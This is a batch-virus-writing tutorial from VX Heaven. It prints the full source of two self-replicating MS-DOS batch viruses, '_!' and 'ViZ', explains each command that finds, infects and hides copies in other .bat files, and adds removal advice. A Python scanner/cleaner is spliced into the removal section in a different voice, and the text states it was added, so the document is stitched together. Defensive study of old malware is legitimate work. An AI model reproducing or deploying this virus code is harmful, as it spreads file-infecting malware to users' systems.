
VX Heaven


Batch Virii

Knowdeth


Utils you will need:

About batch virii

Batch is a language created and used in MS-DOS. Batch files are created with simple text editors, i.e. Edit.com or Notepad.exe. Most batch virii use very simple means of copying and spreading: they just append their code to the end of other *.bat files in the hope that they will be run. Like many HLLs you can use fairly "structured programming" in the form of subs and loops, with if lines for all error handling, much like QBasic.

Advanced batch virii can also rename a binary and then copy themselves to a batch with the same name. They may use machine code to drop or hide payloads such as *.com files through the debugger, and may also use ANSI bombs as a destructive payload, making the "trojan" able to reproduce itself. I do -NOT- agree at all with destructive payloads in virii, and you will not see them in this paper!

The Code ("_!" by Wavefunc):

@ctty nul._!
for %%a in (*.bat ..\*.bat) do set _!=%%a
find "_!"<%_!%
if errorlevel 1 find "_!"<%0.BAT>>%_!%
ctty con._!

This is a very simple batch virus appender.

@
when this is in position 1 in front of the command, @ prevents the command from being echoed to the console, even if echo is on.
ctty
changes terminal device used by the computer
nul
sends the output of the file to nowhere
%%a
scan for batches and, for each one found, store the name of the batch to check (%%a) in the variable.
find
check to see if the virus is present in target
if errorlevel 1
branch on find's result: errorlevel 1 means the string was not there, so go on to the next filename
>>
appends the output to the end of a file

Now for something more advanced.

ViZ by -KD-

:: [ViZ] by -KD- of Metaphase
@echo off%_ViZ%
if '%1=='ViZ goto ViZ%2
if exist c:\_ViZ.bat goto ViZstart
if not exist %0.bat goto ViZexit
find "ViZ"<%0.bat>c:\_ViZ.bat
attrib c:\_ViZ.bat +h
:ViZstart
if '%!ViZ%=='- goto ViZexit
set !ViZ=%!ViZ%-
command /e:5000 /c c:\_ViZ ViZ v
:DaViZ
goto ViZexit
:ViZv
for %%a in (*.bat) do call c:\_ViZ ViZ inf %%a 
exit ViZ
:ViZ_inf
find "ViZ"<%3>nul
if not errorlevel 1 goto ViZlevel
type c:\_ViZ.bat>>%3
exit ViZ
:ViZlevel
set ViZ!=%ViZ!%-
if %ViZ!%==- exit 
:ViZexit

This is an appender that makes one run per session. It looks for and infects one batch per run, in the current dir only.

::
a REM line
@
when this is in position 1 in front of the command, @ prevents the command from being echoed to the console, even if echo is on.
if '%1
branches on the 1st parm
if exist
branches if file is there
if not exist
branches if not there
find
check to see if the virus is present in target
attrib
hide our virus
set
set the variables
command
do the command
for %%a
loop over the batch files, one per %%a
nul
sends the output of the file to nowhere
type
appends the file (through >>)
exit
anything can be after the "exit", but it's nice to name the exit :-)
ViZexit
you're all done

Removal of batch virii

Batch virii work by adding code to the beginning and/or the end of the infected .bat files. All infected code can be removed by loading the infected .bat into a text editor and removing the added lines. Some may keep a hidden copy of themselves in the root and/or other dirs.

The command DIR /AH /S shows ALL hidden files on a drive. You will then need to use attrib *.bat -s -r -h and then del *.bat, substituting the virus's file name for "*.bat".
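Both appenders above select their own body with FIND on a marker string that occurs in every one of their lines ("_!" and "ViZ"), so the same filter, run in reverse, finds and strips the appended code from an infected batch. The following scanner/cleaner is an added example written for this page, not code from the tutorial or its authors; the marker list, the function names and the sample host batch are my own construction.

```python
# Added example: detect and clean the "_!" and "ViZ" appenders described
# on this page. Markers are the strings each virus FINDs in its own body.
MARKERS = ("_!", "ViZ")  # taken from the two samples above


def find_infections(text):
    """Return {marker: [1-based line numbers]} for every marker present."""
    hits = {}
    for marker in MARKERS:
        lines = [n for n, line in enumerate(text.splitlines(), 1) if marker in line]
        if lines:
            hits[marker] = lines
    return hits


def disinfect(text, marker):
    """Drop every line containing `marker`, the inverse of the appender's
    FIND filter. Returns (cleaned_text, removed_line_count); output uses
    CRLF endings as a DOS batch file expects."""
    kept, removed = [], 0
    for line in text.splitlines():
        if marker in line:
            removed += 1
        else:
            kept.append(line)
    cleaned = "".join(line + "\r\n" for line in kept)
    return cleaned, removed


# Constructed sample: a harmless host batch with the "_!" body appended,
# which is exactly what the appender's `find "_!"<%0.BAT>>%_!%` produces.
HOST = "@echo off\r\necho Backing up documents\r\ncopy *.doc a:\\\r\n"
APPENDED = "\r\n".join([
    "@ctty nul._!",
    "for %%a in (*.bat ..\\*.bat) do set _!=%%a",
    'find "_!"<%_!%',
    'if errorlevel 1 find "_!"<%0.BAT>>%_!%',
    "ctty con._!",
]) + "\r\n"
INFECTED = HOST + APPENDED

if __name__ == "__main__":
    for marker, lines in find_infections(INFECTED).items():
        cleaned, n = disinfect(INFECTED, marker)
        print(f"marker {marker!r} on lines {lines}; removed {n} line(s)")
        assert cleaned == HOST
```

Review the reported line numbers before writing the cleaned file back: any legitimate host line that happens to contain the marker is dropped too, and the ViZ sample also leaves a hidden c:\_ViZ.bat that this text-level cleaner does not touch.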

This is my FIRST attempt at a tutorial. If you like it or have any comments I can be reached at #virus on undernet. This is also, in a way, here to help WordBasic/VBA writers, because to be good at macros you must be good at batch. P.S. HLL is not dead!

(C)Knowdeth

You may distribute this paper freely, without any changes or modifications. It cannot be used for any commercial purpose without my permission. The use of this code is ONLY for research and learning purposes and may NOT be used to cause harm to any computer system.
